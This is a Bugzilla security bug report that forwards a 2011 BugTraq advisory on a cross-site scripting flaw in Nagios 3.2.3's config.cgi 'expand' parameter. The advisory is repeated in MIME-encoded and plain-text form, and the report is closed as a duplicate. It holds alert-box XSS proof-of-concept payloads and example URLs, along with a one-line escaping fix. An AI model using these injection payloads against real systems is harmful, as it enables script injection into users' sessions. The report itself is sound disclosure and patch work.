Bugzilla – Bug 698171
VUL-0: nagios: Cross-Site Scripting vulnerability in Nagios
Last modified: 2011-06-08 14:06:35 UTC
Hi. There is a security bug in package 'nagios'. This bug is public. There is no coordinated release date (CRD) set. Original posting: --Apple-Mail-4-474909924 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=utf-8 Anfang der weitergeleiteten E=E2=80=91Mail: > Von: sschurtz@t-online.de > Datum: 1. Juni 2011 16:38:05 MESZ > An: bugtraq@securityfocus.com > Betreff: Cross-Site Scripting vulnerability in Nagios >=20 > Advisory: Cross-Site Scripting vulnerability in Nagios > Advisory ID: SSCHADV2011-006 > Author: Stefan Schurtz > Affected Software: Successfully tested on: nagios 3.2.3 > Vendor URL: http://www.nagios.org > Vendor Status: informed > CVE-ID: - >=20 > ========================== = > Vulnerability Description: > ========================== = >=20 > This is a Cross-Site Scripting vulnerability >=20 > ================== > Technical Details: > ================== >=20 > No input validation for "expand" in config.c(gi) >=20 > View Config -> Command Expansion -> To expand -> <script>alert(String.from= CharCode(88,83,83))</script> > View Config -> Command Expansion -> To expand -> <body onload=alert(666)= > >=20 > or=20 >=20 > http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<= script>alert(String.fromCharCode(88,83,83))</script> > http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<= body onload=alert(666)> >=20 > ========= > Solution: > ========= >=20 > in config.c=20 >=20 > < printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD= CLASS='dataEven'>%s",command_args[0]); >=20 >> printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD C= LASS='dataEven'>%s",escape_string(command_args[0])); >=20 > ==================== > Disclosure Timeline: > ==================== >=20 > 01-Jun-2011 - informed developers > 01-Jun-2011 - Release date of this security advisory > 01-Jun-2011 - post on BugTraq and Full-disclosure >=20 > ======== > Credits: > ======== >=20 > Vulnerability found and advisory written by Stefan Schurtz. >=20 > =========== > References: > =========== >=20 > http://www.nagios.org =20 > http://tracker.nagios.org/view.php?id=224 > http://www.rul3z.de/advisories/SSCHADV2011-006.txt --Apple-Mail-4-474909924 Content-Transfer-Encoding: quoted-printable Content-Type: text/html; charset=utf-8 <html><body bgcolor="#FFFFFF"><div>@package = nagios<br><br>Anfang der w= eitergeleiteten E=E2=80=91Mail:<br><br></div><blockquote type="cite"><div>= <b>Von:</b> <a href="mailto:sschurtz@t-online.de"><a href="mailto:sschur= tz@t-online.de">sschurtz@t-online.de</a></a><br><b>Datum:</b> 1. Juni 2011 1= 6:38:05 MESZ<br><b>An:</b> <a href="mailto:bugtraq@securityfocus.com"><a h= ref="mailto:bugtraq@securityfocus.com">bugtraq@securityfocus.com</a></a><b= r><b>Betreff:</b> <b>Cross-Site Scripting vulnerability in Nagios</b><br><br= ></div></blockquote><div></div><blockquote type="cite"><div><span>Advisory= : Cross-Site Scr= ipting vulnerability in Nagios</span><br><span>Advisory ID: &nbs= p; SSCHADV2011-006</span><br><span>Author: &nbs= p; Stefan Schurtz= </span><br><span>Affected Software: Successfully tested on: nagios 3.2= .3</span><br><span>Vendor URL: &nb= sp;<a href="http://www.nagios.org"><a href="http://www.nagios.org">http:= //www.nagios.org</a></a></span><br><span>Vendor Status: &n= bsp; informed</span><br><span>CVE-ID: &nb= sp; -</span><br><span></span><br><span>== =========================<= /span><br><span>Vulnerability Description:</span><br><span>======= ====================</span><br><span= ></span><br><span>This is a Cross-Site Scripting vulnerability</span><br><sp= an></span><br><span>==================</= span><br><span>Technical Details:</span><br><span>========== =========</span><br><span></span><br><span>No input valida= tion for "expand" in config.c(gi)</span><br><span></span><br><span>View Conf= ig -> Command Expansion -> To expand -> <script>alert(String.= fromCharCode(88,83,83))</script></span><br><span>View Config -> Com= mand Expansion -> To expand -> <body onload=alert(666)></span>= <br><span></span><br><span>or </span><br><span></span><br><span><a href="h= ttp://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand== <script>alert(String.fromCharCode(88,83,83))</script>">http://ww= w.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<scri= pt>alert(String.fromCharCode(88,83,83))</script></a></span><br><spa= n><a href="http://www.example.com/nagios/cgi-bin/config.cgi?type=command= &expand=">http://www.example.com/nagios/cgi-bin/config.cgi?type=comm= and&expand=</a><body onload=alert(666)></span><br><span></span= ><br><span>=========</span><br><span>Solution:</span><br><= span>=========</span><br><span></span><br><span>in config.= c </span><br><span></span><br><span>< printf("<TR CLASS='dataEven'&g= t;<TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven= '>%s",command_args[0]);</span><br><span></span><br><blockquote type="ci= te"><span>printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>= To expand:</TD><TD CLASS='dataEven'>%s",escape_string(command_= args[0]));</span><br></blockquote><span></span><br><span>======== =============</span><br><span>Disclosure Timeline:= </span><br><span>===================== </span><br><span></span><br><span>01-Jun-2011 - informed developers</span><b= r><span>01-Jun-2011 - Release date of this security advisory</span><br><span= >01-Jun-2011 - post on BugTraq and Full-disclosure</span><br><span></span><b= r><span>========</span><br><span>Credits:</span><br><span>== =======</span><br><span></span><br><span>Vulnerability found a= nd advisory written by Stefan Schurtz.</span><br><span></span><br><span>=== =========</span><br><span>References:</span><br><span>=== =========</span><br><span></span><br><span><a href="http= ://www.nagios.org">http://www.nagios.org</a> &= nbsp; </span><br><span><a href="http://tracker.nagios.org/view.php?id= =224">http://tracker.nagios.org/view.php?id=224</a></span><br><span><a h= ref="http://www.rul3z.de/advisories/SSCHADV2011-006.txt">http://www.rul3z.= de/advisories/SSCHADV2011-006.txt</a></span><br></div></blockquote></body></= html>= --Apple-Mail-4-474909924--
Cross-Site Scripting vulnerability in Nagios From: sschurtz () t-online de Date: Wed, 1 Jun 2011 08:38:05 -0600 Advisory: Cross-Site Scripting vulnerability in Nagios Advisory ID: SSCHADV2011-006 Author: Stefan Schurtz Affected Software: Successfully tested on: nagios 3.2.3 Vendor URL: http://www.nagios.org Vendor Status: informed CVE-ID: - ========================== Vulnerability Description: ========================== This is a Cross-Site Scripting vulnerability ================== Technical Details: ================== No input validation for "expand" in config.c(gi) View Config -> Command Expansion -> To expand -> <script>alert(String.fromCharCode(88,83,83))</script> View Config -> Command Expansion -> To expand -> <body onload=alert(666)> or http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)> ========= Solution: ========= in config.c < printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",command_args[0]); printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",escape_string(command_args[0])); ==================== Disclosure Timeline: ==================== 01-Jun-2011 - informed developers 01-Jun-2011 - Release date of this security advisory 01-Jun-2011 - post on BugTraq and Full-disclosure ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: =========== http://www.nagios.org http://tracker.nagios.org/view.php?id=224 http://www.rul3z.de/advisories/SSCHADV2011-006.txt
dup *** This bug has been marked as a duplicate of bug 697895 ***